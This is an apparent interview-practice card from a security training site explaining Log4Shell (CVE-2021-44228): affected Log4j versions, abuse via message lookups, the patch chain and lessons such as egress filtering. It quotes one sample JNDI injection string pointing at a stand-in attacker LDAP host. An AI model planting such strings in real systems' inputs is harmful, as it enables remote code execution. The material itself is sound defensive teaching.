Open cardosec

Case C08020 · Famous breaches · L2 Practitioner

Log4Shell

Practise as: Explain it · Interview · Deep dive

Interview questionWhat is Log4Shell, and why was it rated CVSS 10?

  1. 01 What is it?
  2. 02 How is it abused?
  3. 03 How do you stop it?
What a strong answer covers

Try it out loud first. Then check yourself:

  1. CVE-2021-44228 in Apache Log4j 2 (2.0-beta9 to 2.14.1), disclosed publicly 9 December 2021
  2. Message lookups resolved ${jndi:ldap://attacker/x} in logged strings, loading a remote Java class: unauth RCE
  3. Any logged user input (User-Agent, usernames, chat) could trigger it, and Log4j was embedded everywhere
  4. Fix chain: 2.15.0, 2.16.0 (CVE-2021-45046) removed lookups, 2.17.0 (CVE-2021-45105), 2.17.1 (CVE-2021-44832)
  5. Lessons: SBOM and dependency inventory, egress filtering (would block LDAP callbacks), WAF only as stopgap

If the interviewer pushes back

  • How far does egress filtering protect unpatched Log4Shell hosts, and what can still leak via DNS lookups?

Go deeper

cardosec draws a security topic and gives you a clock: explain it out loud with no notes, then see what you covered and what you missed. Free during early access.